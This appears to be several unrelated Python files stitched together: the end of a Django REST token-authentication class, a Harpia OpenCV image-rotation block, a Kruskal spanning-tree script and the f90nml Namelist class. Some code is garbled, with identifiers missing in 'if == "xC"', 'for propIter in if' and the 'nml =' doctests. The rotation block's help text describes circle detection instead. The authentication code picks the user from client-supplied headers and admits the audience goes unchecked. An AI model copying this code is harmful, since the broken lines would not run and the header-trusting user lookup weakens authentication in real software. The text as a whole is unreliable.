request if the signature is valid and return a two-tuple of (user, token). """ auth = authentication.get_authorization_header(request).split() if not auth or auth[0].lower() != self.keyword.lower().encode(): return None token = self.validate_bearer(auth) try: # TODO Remove this, and don't verify audience as it is not # verified yet. user_profile = self.get_token_user(request, token) if user_profile is not None: token_instance = get_token_instance(user_profile) # Verify token if compare(token, token_instance, secret_key(), api_settings.TOKEN_VERIFICATION_ALGORITHM_INSTANCE): return (user_profile.user, token) except AuthenticationFailed as exc: raise AuthenticationFailed(_(str(exc) or 'Provided credentials invalid.')) except TokenException as exc: raise AuthenticationFailed(_(str(exc))) def get_token_user(self, request, token): """Gets the user specified in the request headers or, more commmonly, in the token payload itself. """ # Get username or user id in request headers username = request.META.get('X_USERNAME') user_id = request.META.get('HTTP_USER_ID') # ex. USER-ID: 100 payload = BaseToken.clean(token)[1] user_profile = None # Get user from username, user_id, or from token payload. if username: user_profile = authenticate_credentials({'user__username': username}) elif user_id: user_profile = authenticate_credentials({'id': user_id}) elif payload.get('aud'): user_profile = authenticate_credentials({'id': payload.get('aud')}) return user_profile def validate_bearer(self, bearer): """Ensure the token passed through request headers is valid and is parsable. If the token is not valid or not parsable, `AuthenticationFailed` is raised. """ if len(bearer) == 1: msg = _('Invalid token header. No credentials provided.') raise AuthenticationFailed(msg) elif len(bearer) > 2: msg = _('Invalid token header. Token string should not contain spaces.') raise AuthenticationFailed(msg) try: token = bearer[1] except UnicodeError: msg = _('Invalid token header. Token string should not contain invalid characters.') raise AuthenticationFailed(msg) return token def authenticate_header(self, request): """Return a string to be used as the value of the `WWW-Authenticate` header in a `401 Unauthenticated` response, or `None` if the authentication scheme should return `403 Permission Denied` responses. """ return '{0} realm="{1}"'.format(self.keyword, self.www_authenticate_realm)
# -*- coding: utf-8 -*- # [HARPIA PROJECT] # # # S2i - Intelligent Industrial Systems # DAS - Automation and Systems Department # UFSC - Federal University of Santa Catarina # Copyright: 2006 - 2007 Luis Carlos Dill Junges (, Clovis Peruchi Scotti (, # Guilherme Augusto Rutzen (, Mathias Erdtmann ( and S2i ( # 2007 - 2009 Clovis Peruchi Scotti (, S2i ( # # # This program is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License version 3, as published # by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranties of # MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR # PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program. If not, see <>. # # For further information, check the COPYING file distributed with this software. # # ---------------------------------------------------------------------- import gtk from harpia.GladeWindow import GladeWindow from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR # i18n import os from harpia.utils.XMLUtils import XMLParser import gettext _ = gettext.gettext gettext.bindtextdomain(APP, DIR) gettext.textdomain(APP) # ---------------------------------------------------------------------- class Properties(GladeWindow, S2iCommonProperties): # ---------------------------------------------------------------------- def __init__(self, PropertiesXML, S2iBlockProperties): self.m_sDataDir = os.environ['HARPIA_DATA_DIR'] filename = self.m_sDataDir + 'glade/rotate.ui' self.m_oPropertiesXML = PropertiesXML self.m_oS2iBlockProperties = S2iBlockProperties widget_list = [ 'Properties', 'isAtCenter', 'isAtPoint', 'isScalling', 'isFilling', 'xC', 'yC', 'BackgroundColor', 'BorderColor', 'HelpView', 'prop_confirm' ] handlers = [ 'on_cancel_clicked', 'on_prop_confirm_clicked', 'on_BackColorButton_clicked', 'on_BorderColorButton_clicked' ] top_window = 'Properties' GladeWindow.__init__(self, filename, top_window, widget_list, handlers) # load properties values self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property") for Property in self.block_properties: if == "xC": self.widgets['xC'].set_value(float(Property.value)); if == "yC": self.widgets['yC'].set_value(float(Property.value)); if == "isFilling": if Property.value == "true": self.widgets['isFilling'].set_active(True); else: self.widgets['isFilling'].set_active(False); if == "isScalling": if Property.value == "true": self.widgets['isScalling'].set_active(True); else: self.widgets['isScalling'].set_active(False); if == "isCenter": if Property.value == "true": self.widgets['isAtCenter'].set_active(True); else: self.widgets['isAtPoint'].set_active(True); self.configure() # load help text # t_oS2iHelp = XMLParser(self.m_sDataDir + "help/rotate" + _("")) # t_oTextBuffer = gtk.TextBuffer() # t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent()))) # self.widgets['HelpView'].set_buffer(t_oTextBuffer) #------------------------Help Text---------------------------------------------- def getHelp(self):#adicionado help return "Detecta formas circulares na imagem de entrada.\ Saida 1 é a resposta da avaliacao(*) e a saida dois mostra os circulos encontrados." # ---------------------------------------------------------------------- def __del__(self): pass # ---------------------------------------------------------------------- def on_prop_confirm_clicked(self, *args): self.widgets['prop_confirm'].grab_focus() for Property in self.block_properties: if == "xC": Property.value = unicode(self.widgets['xC'].get_value()) if == "yC": Property.value = unicode(self.widgets['yC'].get_value()) if == "isCenter": if self.widgets['isAtCenter'].get_active(): Property.value = u"true" else: Property.value = u"false" if == "isFilling": if self.widgets['isFilling'].get_active(): Property.value = u"true" else: Property.value = u"false" if == "isScalling": if self.widgets['isScalling'].get_active(): Property.value = u"true" else: Property.value = u"false" self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML) self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor) self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor) self.widgets['Properties'].destroy() # ---------------------------------------------------------------------- # propProperties = Properties()() # center=0 ) # ------------------------------------------------------------------------------ # Code generation # ------------------------------------------------------------------------------ def generate(blockTemplate): blockTemplate.header += "#define PI 3.1415926535898\n" blockTemplate.header += "double rads(double degs){\n" blockTemplate.header += " return (PI/180 * degs);\n" blockTemplate.header += "}\n\n" for propIter in if propIter[0] == 'xC': xC = propIter[1] elif propIter[0] == 'yC': yC = propIter[1] elif propIter[0] == 'isFilling': isFilling = propIter[1] elif propIter[0] == 'isCenter': isCenter = propIter[1] elif propIter[0] == 'isScalling': isScalling = propIter[1] blockTemplate.imagesIO = '\nIplImage * block$$_img_i1 = NULL;\n' + \ 'double block$$_double_i2;\n' + \ 'IplImage * block$$_img_o1 = NULL;\n' blockTemplate.imagesIO += '\n\n' blockTemplate.functionCall = '\n if(block$$_img_i1)\n {\n' + \ ' double scale;\n int H;\n int W;\n' + \ ' W = block$$_img_i1->width;\n' + \ ' H = block$$_img_i1->height;\n' + \ ' block$$_img_o1 = cvCreateImage(cvSize(W,H),block$$_img_i1->depth,block$$_img_i1->nChannels);\n' + \ ' CvMat* mat = cvCreateMat(2,3,CV_32FC1);\n' if isCenter == "true": blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(W/2, H/2);\n' else: blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(' + str(int(float(xC))) + ',' + str( int(float(yC))) + ');\n' if isScalling == "true": blockTemplate.functionCall += ' scale = H/(fabs(H*sin(rads(90-abs(block$$_double_i2)))) + fabs(W*sin(rads(abs(block$$_double_i2)))));\n' + \ ' cv2DRotationMatrix(center,block$$_double_i2,scale,mat);\n' else: blockTemplate.functionCall += ' cv2DRotationMatrix(center,block$$_double_i2,1.0,mat);\n' if isFilling == "true": blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,CV_WARP_FILL_OUTLIERS,cvScalarAll(0));\n' else: blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,0,cvScalarAll(0));\n' blockTemplate.functionCall += ' }\n' blockTemplate.dealloc = 'cvReleaseImage(&block$$_img_o1);\n' + \ 'cvReleaseImage(&block$$_img_i1);\n' # ------------------------------------------------------------------------------ # Block Setup # ------------------------------------------------------------------------------ def getBlock(): return {"Label": _("Rotate Image"), "Path": {"Python": "rotate", "Glade": "glade/rotate.ui", "Xml": "xml/rotate.xml"}, "Icon": "images/rotate.png", "Color": "90:5:10:150", "InTypes": {0: "HRP_IMAGE", 1: "HRP_DOUBLE"}, "OutTypes": {0: "HRP_IMAGE"}, "Description": _("Rotates input image the input angle degrees. (More options inside)"), "TreeGroup": _("Experimental") }
""" Kruskal's algorithm """ from __future__ import print_function class Graph(object): """ Simple implementation of directed acyclic graph Parameters ---------- nodes : set set of all nodes in the graph dependencies : list list of tuples (weight, node1, node2) which show connection between nodes of the graph with appropriate weight """ def __init__(self, nodes, dependencies): self.nodes = nodes self.dependencies = dependencies self.parent = {} self.rank = {} def __str__(self): """ string representation of the graph """ string = '' for node in sorted(self.nodes): strnode = ["{} -> {} ({})".format(start, end, w) for w, start, end in self.dependencies if start == node] string += "node {}: {}\n".format(node, " ".join(strnode)) return string[:-1] def find(self, edge): """ for current edge return parent edge """ if self.parent[edge] != edge: self.parent[edge] = self.find(self.parent[edge]) return self.parent[edge] def union(self, edge1, edge2): """ union edge1 and edge2 into one tree """ root1 = self.find(edge1) root2 = self.find(edge2) if root1 == root2: return if self.rank[root1] > self.rank[root2]: self.parent[root2] = root1 else: self.parent[root1] = root2 if self.rank[root1] == self.rank[root2]: self.rank[root2] += 1 def minimum_spanning_tree(self): """ a minimum spanning tree Returns ------- out : set return a set of tuples (weight, node1, node2) with minimum spanning tree for a connected weighted graph """ # make_set self.parent = {node: node for node in self.nodes} self.rank = {node: 0 for node in self.nodes} # sort edges # weight should be first item in tuple edges = self.dependencies edges.sort() # set initial tree minimum_spanning_tree = set() for weight, edge1, edge2 in edges: if self.find(edge1) != self.find(edge2): # union edge1 and edge2 self.union(edge1, edge2) # add new dependence to the tree minimum_spanning_tree.add((weight, edge1, edge2)) return minimum_spanning_tree if __name__ in '__main__': GRAPH_NODES = {0, 1, 2, 3, 4, 5, 6, 7} # [(weight, node1, node2), ...] GRAPH_DEPENDECIES = [(4, 0, 4), (7, 4, 2), (6, 2, 6), (8, 0, 1), (3, 1, 5), (7, 5, 7), (6, 5, 6), (8, 5, 2)] GRAPH = Graph(GRAPH_NODES, GRAPH_DEPENDECIES) print("Show graph:\n{}\n".format(GRAPH)) print("Minimum spanning tree: {}".format(GRAPH.minimum_spanning_tree()))
"""Fortran namelist interface. The ``Namelist`` is a representation of a Fortran namelist and its contents in a Python environment. :copyright: Copyright 2014 Marshall Ward, see AUTHORS for details. :license: Apache License, Version 2.0, see LICENSE for details. """ from __future__ import print_function import itertools import copy import numbers import os import platform try: from StringIO import StringIO # Python 2.x except ImportError: from io import StringIO # Python 3.x try: from collections import OrderedDict except ImportError: from ordereddict import OrderedDict try: basestring # Python 2.x except NameError: basestring = str # Python 3.x class Namelist(OrderedDict): """Representation of Fortran namelist in a Python environment. Namelists can be initialised as empty or with a pre-defined `dict` of `items`. If an explicit default start index is required for `items`, then it can be initialised with the `default_start_index` input argument. In addition to the standard methods supported by `dict`, several additional methods and properties are provided for working with Fortran namelists. """ class RepeatValue(object): """Container class for output using repeat counters.""" def __init__(self, n, value): """Create the RepeatValue object.""" self.repeats = n self.value = value def __init__(self, *args, **kwds): """Create the Namelist object.""" s_args = list(args) # If using (unordered) dict, then resort the keys for reproducibility # NOTE: Python 3.7+ dicts are order-preserving. if (args and not isinstance(args[0], OrderedDict) and isinstance(args[0], dict)): s_args[0] = sorted(args[0].items()) # Assign the default start index try: self._default_start_index = kwds.pop('default_start_index') except KeyError: self._default_start_index = None super(Namelist, self).__init__(*s_args, **kwds) # We internally track the list of cogroups (groups of the same name), # although this could be replaced with a per-access search. self._cogroups = [] self.start_index = self.pop('_start_index', {}) # Update the complex tuples as intrinsics # TODO: We are effectively setting these twice. Instead, fetch these # from s_args rather than relying on Namelist to handle the content. if '_complex' in self: for key in self['_complex']: if all(isinstance(v, list) for v in self[key]): self[key] = [complex(*v) for v in self[key]] else: self[key] = complex(*self[key]) self.pop('_complex') # Formatting properties self._column_width = 72 self._indent = 4 * ' ' self._end_comma = False self._uppercase = False self._float_format = '' self._logical_repr = {False: '.false.', True: '.true.'} self._index_spacing = False self._repeat_counter = False self._split_strings = False # Namelist group spacing flag self._newline = False # Check for pre-set indentation self.indent = self.pop('_indent', self.indent) # PyPy 2 is dumb and does not use __setitem__() inside __init__() # This loop will explicitly convert any internal dicts to Namelists. if (platform.python_implementation() == 'PyPy' and platform.python_version_tuple()[0] == '2'): for key, value in self.items(): self[key] = value def __contains__(self, key): """Case-insensitive interface to OrderedDict.""" return super(Namelist, self).__contains__(key.lower()) def __delitem__(self, key): """Case-insensitive interface to OrderedDict.""" lkey = key.lower() if lkey in self._cogroups: # Remove all cogroup values cogrp = Cogroup(self, lkey) for gkey in cogrp.keys: super(Namelist, self).__delitem__(gkey) self._cogroups.remove(lkey) else: super(Namelist, self).__delitem__(key) def __getitem__(self, key): """Case-insensitive interface to OrderedDict.""" if isinstance(key, basestring): lkey = key.lower() if lkey in self._cogroups: return Cogroup(self, lkey) else: return super(Namelist, self).__getitem__(lkey) else: keyiter = iter(key) grp, var = next(keyiter).lower(), next(keyiter).lower() return super(Namelist, self).__getitem__(grp).__getitem__(var) def __setitem__(self, key, value): """Case-insensitive interface to OrderedDict. Python dict inputs to the Namelist, such as derived types, are also converted into Namelists. """ # Promote dicts to Namelists if isinstance(value, dict) and not isinstance(value, Namelist): value = Namelist( value, default_start_index=self.default_start_index ) # Convert list of dicts to list of namelists # (NOTE: This may be for legacy cogroup support? Can it be dropped?) elif is_nullable_list(value, dict): for i, v in enumerate(value): if isinstance(v, Namelist) or v is None: value[i] = v else: # value is a non-Namelist dict value[i] = Namelist( v, default_start_index=self.default_start_index ) lkey = key.lower() super(Namelist, self).__setitem__(lkey, value) def __str__(self): """Print the Fortran representation of the namelist. Currently this can only be applied to the full contents of the namelist file. Indiviual namelist groups or values may not render correctly. """ output = StringIO() if all(isinstance(v, Namelist) for v in self.values()): self._writestream(output) else: print(repr(self), file=output) nml_string = output.getvalue().rstrip() output.close() return nml_string # Format configuration @property def column_width(self): """Set the maximum number of characters per line of the namelist file. :type: ``int`` :default: 72 Tokens longer than ``column_width`` are allowed to extend past this limit. """ return self._column_width @column_width.setter def column_width(self, width): """Validate and set the column width.""" if isinstance(width, int): if width >= 0: self._column_width = width else: raise ValueError('Column width must be nonnegative.') else: raise TypeError('Column width must be a nonnegative integer.') @property def default_start_index(self): """Set the default start index for vectors with no explicit index. :type: ``int``, ``None`` :default: ``None`` When the `default_start_index` is set, all vectors without an explicit start index are assumed to begin with `default_start_index`. This index is shown when printing the namelist output. If set to `None`, then no start index is assumed and is left as implicit for any vectors undefined in `start_index`. """ return self._default_start_index @default_start_index.setter def default_start_index(self, value): if not isinstance(value, int): raise TypeError('default_start_index must be an integer.') self._default_start_index = value @property def end_comma(self): """Append commas to the end of namelist variable entries. :type: ``bool`` :default: ``False`` Fortran will generally disregard any commas separating variable assignments, and the default behaviour is to omit these commas from the output. Enabling this flag will append commas at the end of the line for each variable assignment. """ return self._end_comma @end_comma.setter def end_comma(self, value): """Validate and set the comma termination flag.""" if not isinstance(value, bool): raise TypeError('end_comma attribute must be a logical type.') self._end_comma = value @property def false_repr(self): """Set the string representation of logical false values. :type: ``str`` :default: ``'.false.'`` This is equivalent to the first element of ``logical_repr``. """ return self._logical_repr[0] @false_repr.setter def false_repr(self, value): """Validate and set the logical false representation.""" if isinstance(value, str): if not (value.lower().startswith('f') or value.lower().startswith('.f')): raise ValueError("Logical false representation must start " "with 'F' or '.F'.") else: self._logical_repr[0] = value else: raise TypeError('Logical false representation must be a string.') @property def float_format(self): """Set the namelist floating point format. :type: ``str`` :default: ``''`` The property sets the format string for floating point numbers, following the format expected by the Python ``format()`` function. """ return self._float_format @float_format.setter def float_format(self, value): """Validate and set the upper case flag.""" if isinstance(value, str): # Duck-test the format string; raise ValueError on fail '{0:{1}}'.format(1.23, value) self._float_format = value else: raise TypeError('Floating point format code must be a string.') @property def indent(self): r"""Set the whitespace indentation of namelist entries. :type: ``int``, ``str`` :default: ``' '`` (four spaces) This can be set to an integer, denoting the number of spaces, or to an explicit whitespace character, such as a tab (``\t``). """ return self._indent @indent.setter def indent(self, value): """Validate and set the indent width.""" # Explicit indent setting if isinstance(value, str): if value.isspace() or len(value) == 0: self._indent = value else: raise ValueError('String indentation can only contain ' 'whitespace.') # Set indent width elif isinstance(value, int): if value >= 0: self._indent = value * ' ' else: raise ValueError('Indentation spacing must be nonnegative.') else: raise TypeError('Indentation must be specified by string or space ' 'width.') @property def index_spacing(self): """Apply a space between indexes of multidimensional vectors. :type: ``bool`` :default: ``False`` """ return self._index_spacing @index_spacing.setter def index_spacing(self, value): """Validate and set the index_spacing flag.""" if not isinstance(value, bool): raise TypeError('index_spacing attribute must be a logical type.') self._index_spacing = value # NOTE: This presumes that bools and ints are identical as dict keys @property def logical_repr(self): """Set the string representation of logical values. :type: ``dict`` :default: ``{False: '.false.', True: '.true.'}`` There are multiple valid representations of True and False values in Fortran. This property sets the preferred representation in the namelist output. The properties ``true_repr`` and ``false_repr`` are also provided as interfaces to the elements of ``logical_repr``. """ return self._logical_repr @logical_repr.setter def logical_repr(self, value): """Set the string representation of logical values.""" if not any(isinstance(value, t) for t in (list, tuple)): raise TypeError("Logical representation must be a tuple with " "a valid true and false value.") if not len(value) == 2: raise ValueError("List must contain two values.") self.false_repr = value[0] self.true_repr = value[1] @property def repeat_counter(self): """Return whether the namelist uses repeat counters for arrays. If True, then arrays with repeated values will use repeat tokens. For example, the array ``[1, 2, 2, 2]`` will be written as ``1, 3*2``. :type: ``bool`` :default: ``False`` """ return self._repeat_counter @repeat_counter.setter def repeat_counter(self, value): """Set whether array output should be done in repeat form.""" if isinstance(value, bool): self._repeat_counter = value else: raise TypeError(r"repeat must be of type ``bool``") @property def split_strings(self): """Split strings at the ``column_width`` over multiple lines. :type: ``bool`` :default: ``False`` """ return self._split_strings @split_strings.setter def split_strings(self, value): """Validate and set the split_strings flag.""" if not isinstance(value, bool): raise TypeError('split_strings attribute must be a logical type.') self._split_strings = value @property def start_index(self): """Set the starting index for each vector in the namelist. :type: ``dict`` :default: ``{}`` ``start_index`` is stored as a dict which contains the starting index for each vector saved in the namelist. For the namelist ``vec.nml`` shown below, .. code-block:: fortran &vec_nml a = 1, 2, 3 b(0:2) = 0, 1, 2 c(3:5) = 3, 4, 5 d(:,:) = 1, 2, 3, 4 / the ``start_index`` contents are .. code:: python >>> import f90nml >>> nml ='vec.nml') >>> nml['vec_nml'].start_index {'b': [0], 'c': [3], 'd': [None, None]} The starting index of ``a`` is absent from ``start_index``, since its starting index is unknown and its values cannot be assigned without referring to the corresponding Fortran source. """ return self._start_index @start_index.setter def start_index(self, value): """Validate and set the vector start index.""" # TODO: Validate contents? (May want to set before adding the data.) if not isinstance(value, dict): raise TypeError('start_index attribute must be a dict.') self._start_index = value @property def true_repr(self): """Set the string representation of logical true values. :type: ``str`` :default: ``.true.`` This is equivalent to the second element of ``logical_repr``. """ return self._logical_repr[1] @true_repr.setter def true_repr(self, value): """Validate and set the logical true representation.""" if isinstance(value, str): if not (value.lower().startswith('t') or value.lower().startswith('.t')): raise ValueError("Logical true representation must start with " "'T' or '.T'.") else: self._logical_repr[1] = value else: raise TypeError('Logical true representation must be a string.') @property def uppercase(self): """Print group and variable names in uppercase. :type: ``bool`` :default: ``False`` This is equivalent to the second element of ``logical_repr``. """ return self._uppercase @uppercase.setter def uppercase(self, value): """Validate and set the uppercase flag.""" if not isinstance(value, bool): raise TypeError('uppercase attribute must be a logical type.') self._uppercase = value def write(self, nml_path, force=False, sort=False): """Write Namelist to a Fortran 90 namelist file. >>> nml ='input.nml') >>> nml.write('out.nml') """ nml_is_file = hasattr(nml_path, 'read') if not force and not nml_is_file and os.path.isfile(nml_path): raise IOError('File {0} already exists.'.format(nml_path)) nml_file = nml_path if nml_is_file else open(nml_path, 'w') try: self._writestream(nml_file, sort) finally: if not nml_is_file: nml_file.close() def patch(self, nml_patch): """Update the namelist from another partial or full namelist. This is different from the intrinsic `update()` method, which replaces a namelist section. Rather, it updates the values within a section. """ for sec in nml_patch: if sec not in self: self[sec] = Namelist() self[sec].update(nml_patch[sec]) def add_cogroup(self, key, val): """Append a duplicate group to the Namelist as a new group.""" # TODO: What to do if it's a new group? Add normally? lkey = key.lower() assert lkey in self or lkey in self._cogroups grps = self[lkey] # Set up the cogroup if it does not yet exist if isinstance(grps, Namelist): # NOTE: We re-use the key to preserve the original order. self._cogroups.append(lkey) grps = [grps] # Generate the cogroup label and add to the Namelist # NOTE: In order to preserve ordering, we cannot reuse a key which may # have been removed. So we always generate a new key based on the # largest index. If no key is present, initialize with 1. # Gather the list of existing IDs hdr = '_grp_{0}_'.format(key) idx = [int(k.split(hdr)[1]) for k in self if k.startswith(hdr)] try: cogrp_id = 1 + max(idx) except ValueError: cogrp_id = 1 cogrp_key = '_'.join(['_grp', lkey, str(cogrp_id)]) self[cogrp_key] = val def groups(self): """Return an iterator that spans values with group and variable names. Elements of the iterator consist of a tuple containing two values. The first is internal tuple containing the current namelist group and its variable name. The second element of the returned tuple is the value associated with the current group and variable. """ for key, value in self.items(): for inner_key, inner_value in value.items(): yield (key, inner_key), inner_value def _writestream(self, nml_file, sort=False): """Output Namelist to a streamable file object.""" # Reset newline flag self._newline = False if sort: sel = Namelist(sorted(self.items(), key=lambda t: t[0])) else: sel = self for grp_name, grp_vars in sel.items(): # Check for repeated namelist records (saved as lists) if isinstance(grp_vars, list): for g_vars in grp_vars: self._write_nmlgrp(grp_name, g_vars, nml_file, sort) else: self._write_nmlgrp(grp_name, grp_vars, nml_file, sort) def _write_nmlgrp(self, grp_name, grp_vars, nml_file, sort=False): """Write namelist group to target file.""" if self._newline: print(file=nml_file) self._newline = True # Strip metadata label for repeat groups if grp_name.startswith('_grp_'): grp_name = grp_name[5:].rsplit('_', 1)[0] if self.uppercase: grp_name = grp_name.upper() if sort: grp_vars = Namelist(sorted(grp_vars.items(), key=lambda t: t[0])) print('&{0}'.format(grp_name), file=nml_file) for v_name, v_val in grp_vars.items(): v_start = grp_vars.start_index.get(v_name, None) for v_str in self._var_strings(v_name, v_val, v_start=v_start): print(v_str, file=nml_file) print('/', file=nml_file) def _var_strings(self, v_name, v_values, v_idx=None, v_start=None): """Convert namelist variable to list of fixed-width strings.""" if self.uppercase: v_name = v_name.upper() var_strs = [] # Parse a multidimensional array if is_nullable_list(v_values, list): if not v_idx: v_idx = [] i_s = v_start[::-1][len(v_idx)] if v_start else None # FIXME: We incorrectly assume 1-based indexing if it is # unspecified. This is necessary because our output method always # separates the outer axes to one per line. But we cannot do this # if we don't know the first index (which we are no longer assuming # to be 1-based elsewhere). Unfortunately, the solution needs a # rethink of multidimensional output. # NOTE: Fixing this would also clean up the output of todict(), # which is now incorrectly documenting unspecified indices as 1. # For now, we will assume 1-based indexing here, just to keep # things working smoothly. if i_s is None: i_s = 1 for idx, val in enumerate(v_values, start=i_s): v_idx_new = v_idx + [idx] v_strs = self._var_strings(v_name, val, v_idx=v_idx_new, v_start=v_start) var_strs.extend(v_strs) # Parse derived type contents elif isinstance(v_values, Namelist): for f_name, f_vals in v_values.items(): v_title = '%'.join([v_name, f_name]) v_start_new = v_values.start_index.get(f_name, None) v_strs = self._var_strings(v_title, f_vals, v_start=v_start_new) var_strs.extend(v_strs) # Parse an array of derived types elif is_nullable_list(v_values, Namelist): if not v_idx: v_idx = [] i_s = v_start[::-1][len(v_idx)] if v_start else 1 for idx, val in enumerate(v_values, start=i_s): # Skip any empty elements in a list of derived types if val is None: continue v_title = v_name + '({0})'.format(idx) v_strs = self._var_strings(v_title, val) var_strs.extend(v_strs) else: use_default_start_index = False if not isinstance(v_values, list): v_values = [v_values] use_default_start_index = False else: use_default_start_index = self.default_start_index is not None # Print the index range # TODO: Include a check for len(v_values) to determine if vector if v_idx or v_start or use_default_start_index: v_idx_repr = '(' if v_start or use_default_start_index: if v_start: i_s = v_start[0] else: i_s = self.default_start_index if i_s is None: v_idx_repr += ':' else: i_e = i_s + len(v_values) - 1 if i_s == i_e: v_idx_repr += '{0}'.format(i_s) else: v_idx_repr += '{0}:{1}'.format(i_s, i_e) else: v_idx_repr += ':' if v_idx: idx_delim = ', ' if self._index_spacing else ',' v_idx_repr += idx_delim v_idx_repr += idx_delim.join(str(i) for i in v_idx[::-1]) v_idx_repr += ')' else: v_idx_repr = '' # Split output across multiple lines (if necessary) v_header = self.indent + v_name + v_idx_repr + ' = ' val_strs = [] val_line = v_header if self._repeat_counter: v_values = list( self.RepeatValue(len(list(x)), val) for val, x in itertools.groupby(v_values) ) for i_val, v_val in enumerate(v_values): # Increase column width if the header exceeds this value if len(v_header) >= self.column_width: column_width = len(v_header) + 1 else: column_width = self.column_width if len(val_line) < column_width: # NOTE: We allow non-strings to extend past the column # limit, but strings will be split as needed. v_str = self._f90repr(v_val) # Set a comma placeholder if needed if i_val < len(v_values) - 1 or self.end_comma: v_comma = ', ' else: v_comma = '' if self.split_strings and isinstance(v_val, str): idx = column_width - len(val_line + v_comma.rstrip()) # Split the line along idx until we either exceed the # column width, or read the end of the string. v_l, v_r = v_str[:idx], v_str[idx:] if v_r: # Check if string can fit on the next line new_val_line = ( ' ' * len(v_header) + v_str + v_comma ) if len(new_val_line.rstrip()) <= column_width: val_strs.append(val_line) val_line = ' ' * len(v_header) else: # Split string across multiple lines while v_r: val_line += v_l val_strs.append(val_line) val_line = '' idx = column_width - len(v_comma.rstrip()) v_l, v_r = v_r[:idx], v_r[idx:] v_str = v_l val_line += v_str + v_comma # Line break if len(val_line) >= column_width: # Append current line to list of lines val_strs.append(val_line.rstrip()) # Start new line with space corresponding to header val_line = ' ' * len(v_header) # Append any remaining values if val_line and not val_line.isspace(): val_strs.append(val_line.rstrip()) # Final null values must always precede a comma if val_strs and v_values[-1] is None: # NOTE: val_strs has been rstrip-ed so lead with a space val_strs[-1] += ' ,' # Complete the set of values if val_strs: var_strs.extend(val_strs) return var_strs def todict(self, complex_tuple=False): """Return a dict equivalent to the namelist. Since Fortran variables and names cannot start with the ``_`` character, any keys starting with this token denote metadata, such as starting index. The ``complex_tuple`` flag is used to convert complex data into an equivalent 2-tuple, with metadata stored to flag the variable as complex. This is primarily used to facilitate the storage of the namelist into an equivalent format which does not support complex numbers, such as JSON or YAML. """ # TODO: Preserve ordering nmldict = OrderedDict(self) # Search for namelists within the namelist # TODO: Move repeated stuff to new functions for key, value in self.items(): if isinstance(value, Namelist): nml = copy.deepcopy(value) nmldict[key] = nml.todict(complex_tuple) elif isinstance(value, complex) and complex_tuple: nmldict[key] = [value.real, value.imag] try: nmldict['_complex'].append(key) except KeyError: nmldict['_complex'] = [key] elif isinstance(value, list): complex_list = False for idx, entry in enumerate(value): if isinstance(entry, Namelist): nml = copy.deepcopy(entry) nmldict[key][idx] = nml.todict(complex_tuple) elif isinstance(entry, complex) and complex_tuple: nmldict[key][idx] = [entry.real, entry.imag] complex_list = True if complex_list: try: nmldict['_complex'].append(key) except KeyError: nmldict['_complex'] = [key] # Append the start index if present if self.start_index: nmldict['_start_index'] = self.start_index return nmldict def _f90repr(self, value): """Convert primitive Python types to equivalent Fortran strings.""" if isinstance(value, self.RepeatValue): return self._f90repeat(value) elif isinstance(value, bool): return self._f90bool(value) elif isinstance(value, numbers.Integral): return self._f90int(value) elif isinstance(value, numbers.Real): return self._f90float(value) elif isinstance(value, numbers.Complex): return self._f90complex(value) elif isinstance(value, basestring): return self._f90str(value) elif value is None: return '' else: raise ValueError('Type {0} of {1} cannot be converted to a Fortran' ' type.'.format(type(value), value)) def _f90repeat(self, value): """Return a Fortran 90 representation of a repeated value.""" if value.repeats == 1: return self._f90repr(value.value) else: return "{0}*{1}".format(value.repeats, self._f90repr(value.value)) def _f90bool(self, value): """Return a Fortran 90 representation of a logical value.""" return self.logical_repr[value] def _f90int(self, value): """Return a Fortran 90 representation of an integer.""" return str(value) def _f90float(self, value): """Return a Fortran 90 representation of a floating point number.""" return '{0:{fmt}}'.format(value, fmt=self.float_format) def _f90complex(self, value): """Return a Fortran 90 representation of a complex number.""" return '({0:{fmt}}, {1:{fmt}})'.format(value.real, value.imag, fmt=self.float_format) def _f90str(self, value): """Return a Fortran 90 representation of a string.""" # Replace Python quote escape sequence with Fortran result = repr(str(value)).replace("\\'", "''").replace('\\"', '""') # Un-escape the Python backslash escape sequence result = result.replace('\\\\', '\\') return result # TODO: Move to separate file? What about ref to Namelist? class Cogroup(list): """List of Namelist groups which share a common key. Although Namelists are organized as associative arrays, access is typically through a serial I/O data stream. One consequence is that a namelist may contain multiple keys for different values. This object returns a list of namelist groups which use the same key. Internal keys correspond to the original ordering in the namelist. When an element of the list is updated, the corresponding namelist element is also updated. """ def __init__(self, nml, key, *args, **kwds): """Generate list of Namelist cogroups linked to parent namelist.""" self.nml = nml self.key = key grps = [OrderedDict.__getitem__(self.nml, k) for k in self.keys] super(Cogroup, self).__init__(grps, **kwds) def __setitem__(self, index, value): """Update cogroup list and parent namelist.""" key = self.keys[index] OrderedDict.__setitem__(self.nml, key, value) def __delitem__(self, index): gkey = self.keys[index] OrderedDict.__delitem__(self.nml, gkey) super(Cogroup, self).__delitem__(index) # Remove the cogroup status if keys are depleted if len(self) == 0: self.nml._cogroups.remove(self.key) @property def keys(self): """Return the namelist keys in the cogroup.""" cogrp_keys = [ k for k in self.nml if k.startswith('_grp_{}'.format(self.key)) or k == self.key ] return cogrp_keys def is_nullable_list(val, vtype): """Return True if list contains either values of type `vtype` or None.""" return (isinstance(val, list) and any(isinstance(v, vtype) for v in val) and all((isinstance(v, vtype) or v is None) for v in val))
